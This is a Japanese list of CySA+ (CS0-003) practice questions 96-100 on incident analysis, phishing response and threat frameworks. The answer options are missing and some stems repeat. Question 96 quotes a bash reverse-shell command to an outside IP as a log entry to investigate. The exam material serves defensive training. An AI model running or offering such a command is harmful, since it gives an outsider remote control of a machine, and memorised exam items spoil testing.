CS0-003 試験問題 96
セキュリティ アナリストは、ホストベースの IDS ログで次の疑わしいエントリを特定しました。
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
アクティビティが進行中かどうかを最も正確に確認するためにアナリストが使用する必要があるシェル スクリプトは次のどれですか。
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
アクティビティが進行中かどうかを最も正確に確認するためにアナリストが使用する必要があるシェル スクリプトは次のどれですか。
CS0-003 試験問題 97
アナリストは、侵害の可能性があるホストを調査しているときに、プロセスBGInfo.exe(PID
1024) は、ホストの詳細を含むデスクトップの背景を作成するために使用される Sysinternals ツールであり、2 日以上実行されています。異常な動作に基づいて、この潜在的に悪意のあるプロセスについて最もよく理解できるアクティビティは次のどれですか。
1024) は、ホストの詳細を含むデスクトップの背景を作成するために使用される Sysinternals ツールであり、2 日以上実行されています。異常な動作に基づいて、この潜在的に悪意のあるプロセスについて最もよく理解できるアクティビティは次のどれですか。
CS0-003 試験問題 98
給与部門の従業員がフィッシング攻撃の標的となり、攻撃者は部門長になりすまして、口座振込情報を新しい口座に更新するよう要求しました。その後、不正な口座に入金が行われました。攻撃の通知を受け取ったときにインシデント対応チームが最初に取るべきアクションは次のうちどれですか。
CS0-003 試験問題 99
脅威アクターの行動を伝えるために一般的に使用される 4 つのコンポーネント フレームワークは次のどれですか。
CS0-003 試験問題 100
セキュリティ アナリストは、ネットワーク ルーティングの異常を特定しようとしています。アナリストがシェル スクリプトで目的を最も正確に達成するために使用できる関数は次のどれですか。
